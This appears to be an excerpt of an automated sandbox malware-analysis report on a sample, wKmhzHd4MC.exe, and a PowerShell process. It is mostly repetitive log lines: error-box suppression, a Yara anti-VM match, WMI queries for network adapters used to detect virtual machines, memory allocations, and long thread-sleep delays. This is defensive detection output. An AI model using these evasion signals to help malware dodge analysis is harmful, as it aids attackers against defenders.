Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: wKmhzHd4MC.exe PID: 2084, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 11A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 2C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 12D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 8A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 8BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 9BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 1080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Memory allocated: 10B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199891	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199766	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199641	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199531	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199422	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199313	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199188	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1199063	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198953	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198844	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198719	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198610	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198485	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198360	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198235	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1198110	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197985	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197871	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197747	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197478	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197369	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197250	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197141	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1197031	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196922	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196812	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196702	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196578	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196469	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196360	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196235	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1196110	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195985	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195875	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195766	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195656	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195547	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195438	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195297	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1195171	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194837	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194724	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194609	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194500	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194360	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194249	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194141	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1194016	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1193907	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Thread delayed: delay time: 1193782	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5163	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4539	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Window / User API: threadDelayed 7013	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Window / User API: threadDelayed 2823	Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1199063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1198110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197871s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197747s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197478s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197369s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1197031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1196110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe TID: 7516	Thread sleep time: -1195766s >= -30000s	Jump to behavior
